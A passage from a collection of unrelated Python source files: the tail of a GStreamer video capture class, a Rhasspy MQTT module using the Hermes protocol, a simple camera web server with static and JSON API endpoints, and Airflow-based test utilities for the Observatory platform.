self.writer = cv2.VideoWriter(self._gst_write_pipeline(), 0, output_fps,
self.size, True)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv ! '
'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx !'
'videoconvert ! appsink'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=(int)%d, height=(int)%d !'
'videoconvert ! appsink'
% self.size
)
if self.protocol == Protocol.FILE:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, '
'format=(string)NV12, framerate=(fraction)%d/1 ! '
% (
self.input_uri[6:],
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=(int)%d, height=(int)%d, '
'format=(string)YUY2, framerate=(fraction)%d/1 ! '
% (
self.input_uri,
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'avenc_h264_omx' in gst_elements:
h264_encoder = 'avenc_h264_omx'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for video file
if self.protocol == Protocol.FILE:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
pos = uri.find('://')
if '/dev/video' in uri:
protocol = Protocol.V4L2
elif uri[:pos] == 'csi':
protocol = Protocol.CSI
elif uri[:pos] == 'rtsp':
protocol = Protocol.RTSP
else:
protocol = Protocol.FILE
return protocol
|
mqtt.py
|
"""Support for MQTT input/output."""
import json
import socket
import threading
import time
from collections import defaultdict
from queue import Queue
from typing import Any, Dict, List, Optional
import pydash
from rhasspy.actor import RhasspyActor
# -----------------------------------------------------------------------------
class MqttPublish:
"""Request to publish payload to topic."""
def __init__(self, topic: str, payload: bytes) -> None:
self.topic = topic
self.payload = payload
class MqttSubscribe:
"""Request to subscribe to a topic."""
def __init__(self, topic: str, receiver: Optional[RhasspyActor] = None) -> None:
self.topic = topic
self.receiver = receiver
class MqttConnected:
"""Response when connected to broker."""
pass
class MqttDisconnected:
"""Response when disconnected from broker."""
pass
class MqttMessage:
"""Response when MQTT message is received."""
def __init__(self, topic: str, payload: bytes) -> None:
self.topic = topic
self.payload = payload
class MessageReady:
"""Internal event for actor."""
pass
# -----------------------------------------------------------------------------
# Interoperability with Snips.AI Hermes protocol
# https://docs.snips.ai/ressources/hermes-protocol
# -----------------------------------------------------------------------------
class HermesMqtt(RhasspyActor):
"""Communicate with MQTT broker using Hermes protocol."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.client = None
self.connected = False
self.subscriptions: Dict[str, List[RhasspyActor]] = defaultdict(list)
self.publications: Dict[str, List[bytes]] = defaultdict(list)
self.message_queue: Queue = Queue()
self.site_ids: List[str] = []
self.site_id = "default"
self.host = "localhost"
self.port = 1883
self.username = ""
self.password = None
self.reconnect_sec = 5
self.publish_intents = True
# -------------------------------------------------------------------------
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
# Load settings
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
if len(self.site_ids) > 0:
self.site_id = self.site_ids[0]
else:
self.site_id = "default"
self.host = self.profile.get("mqtt.host", "localhost")
self.port = int(self.profile.get("mqtt.port", 1883))
self.username = self.profile.get("mqtt.username", "")
self.password = self.profile.get("mqtt.password", None)
self.reconnect_sec = self.profile.get("mqtt.reconnect_sec", 5)
self.publish_intents = self.profile.get("mqtt.publish_intents", True)
if self.profile.get("mqtt.enabled", False):
self.transition("connecting")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
self.save_for_later(message, sender)
def to_connecting(self, from_state: str) -> None:
"""Transition to connecting state."""
import paho.mqtt.client as mqtt
self.client = mqtt.Client()
assert self.client is not None
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_disconnect = self.on_disconnect
if len(self.username) > 0:
self._logger.debug("Logging in as %s", self.username)
self.client.username_pw_set(self.username, self.password)
self._logger.debug("Connecting to MQTT broker %s:%s", self.host, self.port)
def do_connect():
success = False
while not success:
try:
ret = self.client.connect(self.host, self.port)
self.client.loop_start()
while (ret != 0) and (self.reconnect_sec > 0):
self._logger.warning("Connection failed: %s", ret)
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
ret = self.client.connect(self.host, self.port)
success = True
except Exception:
self._logger.exception("connecting")
if self.reconnect_sec > 0:
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
self._logger.debug("Connection successful.")
# Connect in a separate thread
threading.Thread(target=do_connect, daemon=True).start()
def in_connecting(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connecting."""
if isinstance(message, MqttConnected):
self.connected = True
self.transition("connected")
elif isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.save_for_later(message, sender)
def to_connected(self, from_state: str) -> None:
"""Transition to connected state."""
assert self.client is not None
# Subscribe to topics
for topic in self.subscriptions:
self.client.subscribe(topic)
self._logger.debug("Subscribed to %s", topic)
# Publish outstanding messages
for topic, payloads in self.publications.items():
for payload in payloads:
self.client.publish(topic, payload)
self.publications.clear()
def in_connected(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connected state."""
if isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.transition("connecting")
elif isinstance(message, MessageReady):
while not self.message_queue.empty():
mqtt_message = self.message_queue.get()
for receiver in self.subscriptions[mqtt_message.topic]:
self.send(receiver, mqtt_message)
elif self.connected:
from rhasspy.intent import IntentRecognized
assert self.client is not None
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
self.client.subscribe(message.topic)
self._logger.debug("Subscribed to %s", message.topic)
elif isinstance(message, MqttPublish):
self.client.publish(message.topic, message.payload)
elif isinstance(message, IntentRecognized):
if self.publish_intents:
self.publish_intent(message.intent)
else:
self.save_for_later(message, sender)
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
if self.client is not None:
self.connected = False
self._logger.debug("Stopping MQTT client")
self.client.loop_stop()
self.client = None
# -------------------------------------------------------------------------
def save_for_later(self, message: Any, sender: RhasspyActor) -> None:
"""Cache message until connected."""
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
elif isinstance(message, MqttPublish):
self.publications[message.topic].append(message.payload)
# -------------------------------------------------------------------------
def on_connect(self, client, userdata, flags, rc):
"""Callback when connected to broker."""
try:
self._logger.info("Connected to %s:%s", self.host, self.port)
self.send(self.myAddress, MqttConnected())
except Exception:
self._logger.exception("on_connect")
def on_disconnect(self, client, userdata, flags, rc):
"""Callback when disconnected from broker."""
try:
self._logger.warning("Disconnected")
self.connected = False
self.send(self.myAddress, MqttDisconnected())
except Exception:
self._logger.exception("on_disconnect")
def on_message(self, client, userdata, msg):
"""Callback when message received."""
try:
self.message_queue.put(MqttMessage(msg.topic, msg.payload))
self.send(self.myAddress, MessageReady())
except Exception:
self._logger.exception("on_message")
# -------------------------------------------------------------------------
def publish_intent(self, intent: Dict[str, Any]) -> None:
"""Publish intent to MQTT using Hermes protocol."""
intent_name = pydash.get(intent, "intent.name", "")
not_recognized = len(intent_name) == 0
assert self.client is not None
if not_recognized:
# Publish using Hermes protocol
topic = "hermes/nlu/intentNotRecognized"
payload = json.dumps({"sessionId": "", "input": intent.get("text", "")})
else:
# Publish using Rhasspy protocol
topic = f"rhasspy/intent/{intent_name}"
payload = json.dumps(
{ev["entity"]: ev["value"] for ev in intent["entities"]}
)
self.client.publish(topic, payload)
# Publish using Hermes protocol
topic = f"hermes/intent/{intent_name}"
payload = json.dumps(
{
"sessionId": "",
"siteId": self.site_id,
"input": intent.get("text", ""),
"intent": {
"intentName": intent_name,
"confidenceScore": pydash.get(intent, "intent.confidence", 1),
},
"slots": [
{
"slotName": ev["entity"],
"confidence": 1,
"value": {"kind": ev["entity"], "value": ev["value"]},
"rawValue": ev["value"],
}
for ev in intent.get("entities", [])
],
}
).encode()
self.client.publish(topic, payload)
self._logger.debug("Published intent to %s", topic)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems on startup."""
problems: Dict[str, Any] = {}
s = socket.socket()
try:
s.connect((self.host, self.port))
except Exception:
problems[
"Can't connect to server"
] = f"Unable to connect to your MQTT server at {self.host}:{self.port}. Is it running?"
finally:
s.close()
return problems
|
STWebServer.py
|
#Copyright (C) 2021 Andrew Palardy
#See LICENSE file for complete license terms
#WebServer class
#This file manages the web interface and web api endpoints
import cv2
import numpy as np
from datetime import datetime
import json
import random
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
import os.path
import logging
#Web Server glass
class STWebServer():
def __init__(self,WebConfig,Objs):
#Store objects for use in the handler
self.Objs = Objs
print("WEB: Config is ",WebConfig)
#Get configuration fields
self.Host = WebConfig.get('host','')
self.Port = WebConfig.get('port',8080)
#Start webserver task
self.Task = threading.Thread(target=self.task,name="Webserver")
self.Task.start()
#Separate thread to run webserver
def task(self):
#Store server so it can be used by request handler
server = self
#Request Handling class
class STWebServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("Path is",self.path)
#If the request starts with API, call the api endpoint
if(self.path.startswith('/api/')):
#Strip prefix
self.path = self.path.replace("/api/","")
self.do_api()
#Otherwise, it must be a static element, so call the static handler
else:
self.do_static()
#Function to return a string result
def return_string(self,data):
self.wfile.write(bytes(data,"utf-8"))
return
#Function to return the index page
def do_index(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("<html><head><title>https://pythonbasics.org</title></head>", "utf-8"))
self.wfile.write(bytes("<p>Request: %s</p>" % self.path, "utf-8"))
self.wfile.write(bytes("<body>", "utf-8"))
self.wfile.write(bytes("<p>This is an example web server.</p>", "utf-8"))
self.wfile.write(bytes("<table>","utf-8"))
#Print information about each camera
for camera in server.Objs['CamCd']:
self.wfile.write(bytes("<h2>"+camera.Name+"</h2>","utf-8"))
self.wfile.write(bytes("<p>Status:<br>"+json.dumps(camera.CStatus)+"</p>","utf-8"))
#self.wfile.write(bytes("<table>","utf-8"))
#self.wfile.write(bytes("<tr>"+json.dumps(server.Objs)+"</p","utf-8"))
#self.wfile.write(bytes("</table>","utf-8"))
self.wfile.write(bytes("</body></html>", "utf-8"))
#Function to return a static file
def do_static(self):
#Strip the path of all ..'s so people don't try and escape
self.path = self.path.replace("..","")
#Add Add the path of the current file + 'static'
root = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
#If the path is empty, add the index file
if self.path == '/':
filename = root + '/index.html'
else:
filename = root + self.path
#Determine if file does or does not exist
if(not os.path.exists(filename)):
#Return an error
self.do_error()
return
#Determine file type
self.send_response(200)
if filename.endswith('.css'):
self.send_header('Content-type', 'text/css')
elif filename.endswith('.json'):
self.send_header('Content-type', 'application/json')
elif filename.endswith('.js'):
self.send_header('Content-type', 'application/javascript')
elif filename.endswith('.ico'):
self.send_header('Content-type', 'image/x-icon')
elif filename.endswith('.png'):
self.send_header('Content-type', 'image/png')
else:
self.send_header('Content-type', 'text/html')
self.end_headers()
#Open file as binary and return as binary
with open(filename, 'rb') as fh:
data = fh.read()
self.wfile.write(data)
#Function to return an API endpoint
def do_api(self):
#Camera endpoint (single camera detection status)
if(self.path.startswith('camera/')):
self.do_api_camera()
#Camera Still endpoint
elif(self.path.startswith('camerastill/')):
self.do_api_camerastill()
#Cameras endpoint (array of camera statuses)
elif(self.path.startswith('cameras')):
self.do_api_cameras()
#Box List endpoint
elif(self.path.startswith('boxes')):
self.do_api_boxes()
#Other
else:
self.do_error()
#Function to return an error in HTML form
def do_error(self):
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.return_string("<html><body>Not Found</body></html>")
#Function to handle the cameras endpoint (array of camera statuses)
def do_api_cameras(self):
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
RtnData = []
for Cam in server.Objs['CamCd']:
RtnData.append(Cam.CStatus)
#JSON-ify the result
self.return_string(json.dumps(RtnData))
#Function to handle the camera endpoint (array of detections for one camera)
def do_api_camera(self):
#Strip the API endpoint so we can identify the camera name
self.path = self.path.replace('camera/','')
print("WEB: Identifying camera by name",self.path)
#Check which camera it is
RtnData = None
for Cam in server.Objs['CamCd']:
if self.path.startswith(Cam.Name):
#Camera is valid, but results are not
if Cam.Results is None:
RtnData = {'Length':0}\
#Results are valid
else:
RtnData = {'Length':len(Cam.Results),'Results':Cam.Results}
#If none, path wasn't found
if RtnData is None:
self.do_error()
return
#Otherwise, JSON-ify it
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
self.return_string(json.dumps(RtnData))
#Function to return a JPEG of the latest image from a camera
def do_api_camerastill(self):
#Strip the API endpoint so we can identify the camera name
self.path = self.path.replace('camerastill/','')
print("WEB: Identifying camera by name for still",self.path)
#Check which camera it is
RtnData = None
ImgFound = False
for Cam in server.Objs['CamCd']:
if self.path.startswith(Cam.Name):
#Camera is correct
ImgFound = True
#Camera is correct and image is valid, convert image to bytes
if Cam.ImageColor is not None:
ImSuccess,RtnData = cv2.imencode(".jpeg",Cam.ImageColor)
if not ImSuccess:
RtnData = None
#If ImgFound is false, return error
if ImgFound == False:
self.do_error()
return
#If RtnData is none, then the image was found to be invalid
elif RtnData is None:
#Return 503 error if camera is offline
self.send_response(503)
self.end_headers()
return
#Otherwise, return binary data
self.send_response(200)
self.send_header('Content-type','image/jpeg')
self.end_headers()
self.wfile.write(RtnData.tobytes())
#Custom log_message which does absolutely nothing to stop logging all the requests
def log_message(self, format, *args):
return
print("WEB: Starting task")
#Create server
self.Server = HTTPServer((self.Host,self.Port),STWebServerHandler)
#Run forever
self.Server.serve_forever()
#Finished running the webserver
print("WEB: Stopped webserver")
#Stop the webserver
def stop(self):
self.Server.server_close()
|
test_utils.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Sources:
# * https://github.com/apache/airflow/blob/ffb472cf9e630bd70f51b74b0d0ea4ab98635572/airflow/cli/commands/task_command.py
# * https://github.com/apache/airflow/blob/master/docs/apache-airflow/best-practices.rst
# Copyright (c) 2011-2017 Ruslan Spivak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Sources:
# * https://github.com/rspivak/sftpserver/blob/master/src/sftpserver/__init__.py
# Copyright 2021 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: James Diprose
import contextlib
import datetime
import logging
import os
import shutil
import socket
import socketserver
import threading
import time
import unittest
import uuid
from dataclasses import dataclass
from datetime import datetime, timedelta
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from multiprocessing import Process
from typing import Dict, List
from unittest.mock import patch
import croniter
import google
import httpretty
import paramiko
import pendulum
import requests
from airflow import DAG, settings
from airflow.exceptions import AirflowException
from airflow.models import DagBag
from airflow.models.connection import Connection
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstance
from airflow.models.variable import Variable
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import db
from airflow.utils.state import State
from click.testing import CliRunner
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from dateutil.relativedelta import relativedelta
from freezegun import freeze_time
from google.cloud import bigquery, storage
from google.cloud.exceptions import NotFound
from pendulum import DateTime
from sftpserver.stub_sftp import StubServer, StubSFTPServer
from observatory.api.testing import ObservatoryApiEnvironment
from observatory.platform.elastic.elastic_environment import ElasticEnvironment
from observatory.platform.utils.airflow_utils import AirflowVars
from observatory.platform.utils.config_utils import module_file_path
from observatory.platform.utils.file_utils import (
crc32c_base64_hash,
get_file_hash,
gzip_file_crc,
list_to_jsonl_gz,
)
from observatory.platform.utils.gc_utils import (
SourceFormat,
bigquery_sharded_table_id,
load_bigquery_table,
upload_files_to_cloud_storage,
)
from observatory.platform.utils.workflow_utils import find_schema
def random_id():
"""Generate a random id for bucket name.
:return: a random string id.
"""
return str(uuid.uuid4()).replace("-", "")
def test_fixtures_path(*subdirs) -> str:
"""Get the path to the Observatory Platform test data directory.
:return: he Observatory Platform test data directory.
"""
base_path = module_file_path("tests.fixtures")
return os.path.join(base_path, *subdirs)
def find_free_port(host: str = "localhost") -> int:
"""Find a free port.
:param host: the host.
:return: the free port number
"""
with socketserver.TCPServer((host, 0), None) as tcp_server:
return tcp_server.server_address[1]
def save_empty_file(path: str, file_name: str) -> str:
"""Save empty file and return path.
:param path: the file directory.
:param file_name: the file name.
:return: the full file path.
"""
file_path = os.path.join(path, file_name)
open(file_path, "a").close()
return file_path
class ObservatoryEnvironment:
OBSERVATORY_HOME_KEY = "OBSERVATORY_HOME"
def __init__(
self,
project_id: str = None,
data_location: str = None,
api_host: str = "localhost",
api_port: int = 5000,
enable_api: bool = True,
enable_elastic: bool = False,
elastic_port: int = 9200,
kibana_port: int = 5601,
):
"""Constructor for an Observatory environment.
To create an Observatory environment:
env = ObservatoryEnvironment()
with env.create():
pass
:param project_id: the Google Cloud project id.
:param data_location: the Google Cloud data location.
:param api_host: the Observatory API host.
:param api_port: the Observatory API port.
:param enable_api: whether to enable the observatory API or not.
:param enable_elastic: whether to enable the Elasticsearch and Kibana test services.
:param elastic_port: the Elastic port.
:param kibana_port: the Kibana port.
"""
self.project_id = project_id
self.data_location = data_location
self.api_host = api_host
self.api_port = api_port
self.buckets = []
self.datasets = []
self.data_path = None
self.session = None
self.temp_dir = None
self.api_env = None
self.api_session = None
self.enable_api = enable_api
self.enable_elastic = enable_elastic
self.elastic_port = elastic_port
self.kibana_port = kibana_port
self.dag_run: DagRun = None
self.elastic_env: ElasticEnvironment = None
if self.create_gcp_env:
self.download_bucket = self.add_bucket()
self.transform_bucket = self.add_bucket()
self.storage_client = storage.Client()
self.bigquery_client = bigquery.Client()
else:
self.download_bucket = None
self.transform_bucket = None
self.storage_client = None
self.bigquery_client = None
@property
def create_gcp_env(self) -> bool:
"""Whether to create the Google Cloud project environment.
:return: whether to create Google Cloud project environ,ent
"""
return self.project_id is not None and self.data_location is not None
def assert_gcp_dependencies(self):
"""Assert that the Google Cloud project dependencies are met.
:return: None.
"""
assert self.create_gcp_env, "Please specify the Google Cloud project_id and data_location"
def add_bucket(self) -> str:
"""Add a Google Cloud Storage Bucket to the Observatory environment.
The bucket will be created when create() is called and deleted when the Observatory
environment is closed.
:return: returns the bucket name.
"""
self.assert_gcp_dependencies()
bucket_name = random_id()
self.buckets.append(bucket_name)
return bucket_name
def _create_bucket(self, bucket_id: str) -> None:
"""Create a Google Cloud Storage Bucket.
:param bucket_id: the bucket identifier.
:return: None.
"""
self.assert_gcp_dependencies()
self.storage_client.create_bucket(bucket_id, location=self.data_location)
def _create_dataset(self, dataset_id: str) -> None:
"""Create a BigQuery dataset.
:param dataset_id: the dataset identifier.
:return: None.
"""
self.assert_gcp_dependencies()
dataset = bigquery.Dataset(f"{self.project_id}.{dataset_id}")
dataset.location = self.data_location
self.bigquery_client.create_dataset(dataset, exists_ok=True)
def _delete_bucket(self, bucket_id: str) -> None:
"""Delete a Google Cloud Storage Bucket.
:param bucket_id: the bucket identifier.
:return: None.
"""
self.assert_gcp_dependencies()
try:
bucket = self.storage_client.get_bucket(bucket_id)
bucket.delete(force=True)
except requests.exceptions.ReadTimeout:
pass
except google.api_core.exceptions.NotFound:
logging.warning(
f"Bucket {bucket_id} not found. Did you mean to call _delete_bucket on the same bucket twice?"
)
def add_dataset(self, prefix: str = "") -> str:
"""Add a BigQuery dataset to the Observatory environment.
The BigQuery dataset will be deleted when the Observatory environment is closed.
:param prefix: an optional prefix for the dataset.
:return: the BigQuery dataset identifier.
"""
self.assert_gcp_dependencies()
if prefix != "":
dataset_id = f"{prefix}_{random_id()}"
else:
dataset_id = random_id()
self.datasets.append(dataset_id)
return dataset_id
def _delete_dataset(self, dataset_id: str) -> None:
"""Delete a BigQuery dataset.
:param dataset_id: the BigQuery dataset identifier.
:return: None.
"""
self.assert_gcp_dependencies()
try:
self.bigquery_client.delete_dataset(dataset_id, not_found_ok=True, delete_contents=True)
except requests.exceptions.ReadTimeout:
pass
def add_variable(self, var: Variable) -> None:
"""Add an Airflow variable to the Observatory environment.
:param var: the Airflow variable.
:return: None.
"""
self.session.add(var)
self.session.commit()
def add_connection(self, conn: Connection):
"""Add an Airflow connection to the Observatory environment.
:param conn: the Airflow connection.
:return: None.
"""
self.session.add(conn)
self.session.commit()
def run_task(self, task_id: str) -> TaskInstance:
"""Run an Airflow task.
:param task_id: the Airflow task identifier.
:return: None.
"""
assert self.dag_run is not None, "with create_dag_run must be called before run_task"
dag = self.dag_run.dag
run_id = self.dag_run.run_id
task = dag.get_task(task_id=task_id)
ti = TaskInstance(task, run_id=run_id)
ti.dag_run = self.dag_run
ti.init_run_context(raw=True)
ti.run(ignore_ti_state=True)
return ti
@contextlib.contextmanager
def create_dag_run(self, dag: DAG, execution_date: pendulum.DateTime, freeze: bool = True):
"""Create a DagRun that can be used when running tasks.
During cleanup the DAG run state is updated.
:param dag: the Airflow DAG instance.
:param execution_date: the execution date of the DAG.
:param freeze: whether to freeze time to the start date of the DAG run.
:return: None.
"""
# Get start date, which is one schedule interval after execution date
if isinstance(dag.normalized_schedule_interval, (timedelta, relativedelta)):
start_date = (
datetime.fromtimestamp(execution_date.timestamp(), pendulum.tz.UTC) + dag.normalized_schedule_interval
)
else:
start_date = croniter.croniter(dag.normalized_schedule_interval, execution_date).get_next(pendulum.DateTime)
frozen_time = freeze_time(start_date, tick=True)
run_id = "manual__{0}".format(execution_date.isoformat())
# Make sure google auth uses real DateTime and not freezegun fake time
with patch("google.auth._helpers.utcnow", wraps=datetime.utcnow) as mock_utc_now:
try:
if freeze:
frozen_time.start()
state = State.RUNNING
self.dag_run = dag.create_dagrun(
run_id=run_id, state=state, execution_date=execution_date, start_date=pendulum.now("UTC")
)
yield self.dag_run
finally:
self.dag_run.update_state()
if freeze:
frozen_time.stop()
@contextlib.contextmanager
def create(self, task_logging: bool = False):
"""Make and destroy an Observatory isolated environment, which involves:
* Creating a temporary directory.
* Setting the OBSERVATORY_HOME environment variable.
* Initialising a temporary Airflow database.
* Creating download and transform Google Cloud Storage buckets.
* Creating default Airflow Variables: AirflowVars.DATA_PATH, AirflowVars.PROJECT_ID, AirflowVars.DATA_LOCATION,
AirflowVars.DOWNLOAD_BUCKET and AirflowVars.TRANSFORM_BUCKET.
* Cleaning up all resources when the environment is closed.
:param task_logging: display airflow task logging
:yield: Observatory environment temporary directory.
"""
with CliRunner().isolated_filesystem() as temp_dir:
# Set temporary directory
self.temp_dir = temp_dir
# Prepare environment
self.new_env = {self.OBSERVATORY_HOME_KEY: os.path.join(self.temp_dir, ".observatory")}
prev_env = dict(os.environ)
try:
# Update environment
os.environ.update(self.new_env)
# Create Airflow SQLite database
settings.DAGS_FOLDER = os.path.join(self.temp_dir, "airflow", "dags")
os.makedirs(settings.DAGS_FOLDER, exist_ok=True)
airflow_db_path = os.path.join(self.temp_dir, "airflow.db")
settings.SQL_ALCHEMY_CONN = f"sqlite:///{airflow_db_path}"
logging.info(f"SQL_ALCHEMY_CONN: {settings.SQL_ALCHEMY_CONN}")
settings.configure_orm(disable_connection_pool=True)
self.session = settings.Session
db.initdb()
# Setup Airflow task logging
original_log_level = logging.getLogger().getEffectiveLevel()
if task_logging:
# Set root logger to INFO level, it seems that custom 'logging.info()' statements inside a task
# come from root
logging.getLogger().setLevel(20)
# Propagate logging so it is displayed
logging.getLogger("airflow.task").propagate = True
# Create buckets and datasets
if self.create_gcp_env:
for bucket_id in self.buckets:
self._create_bucket(bucket_id)
for dataset_id in self.datasets:
self._create_dataset(dataset_id)
# Add default Airflow variables
self.data_path = os.path.join(self.temp_dir, "data")
self.add_variable(Variable(key=AirflowVars.DATA_PATH, val=self.data_path))
# Add Google Cloud environment related Airflow variables
if self.create_gcp_env:
self.add_variable(Variable(key=AirflowVars.PROJECT_ID, val=self.project_id))
self.add_variable(Variable(key=AirflowVars.DATA_LOCATION, val=self.data_location))
self.add_variable(Variable(key=AirflowVars.DOWNLOAD_BUCKET, val=self.download_bucket))
self.add_variable(Variable(key=AirflowVars.TRANSFORM_BUCKET, val=self.transform_bucket))
# Start elastic
if self.enable_elastic:
elastic_build_path = os.path.join(self.temp_dir, "elastic")
self.elastic_env = ElasticEnvironment(
build_path=elastic_build_path, elastic_port=self.elastic_port, kibana_port=self.kibana_port
)
self.elastic_env.start()
self.dag_run: DagRun = None
# Create ObservatoryApiEnvironment
if self.enable_api:
self.api_env = ObservatoryApiEnvironment(host=self.api_host, port=self.api_port)
with self.api_env.create():
self.api_session = self.api_env.session
yield self.temp_dir
else:
yield self.temp_dir
finally:
# Set logger settings back to original settings
logging.getLogger().setLevel(original_log_level)
logging.getLogger("airflow.task").propagate = False
# Revert environment
os.environ.clear()
os.environ.update(prev_env)
if self.create_gcp_env:
# Remove Google Cloud Storage buckets
for bucket_id in self.buckets:
self._delete_bucket(bucket_id)
# Remove BigQuery datasets
for dataset_id in self.datasets:
self._delete_dataset(dataset_id)
# Stop elastic
if self.enable_elastic:
self.elastic_env.stop()
class ObservatoryTestCase(unittest.TestCase):
"""Common test functions for testing Observatory Platform DAGs"""
def __init__(self, *args, **kwargs):
"""Constructor which sets up variables used by tests.
:param args: arguments.
:param kwargs: keyword arguments.
"""
super(ObservatoryTestCase, self).__init__(*args, **kwargs)
self.storage_client = storage.Client()
self.bigquery_client = bigquery.Client()
# Turn logging to warning because vcr prints too much at info level
logging.basicConfig()
vcr_log = logging.getLogger("vcr")
vcr_log.setLevel(logging.WARNING)
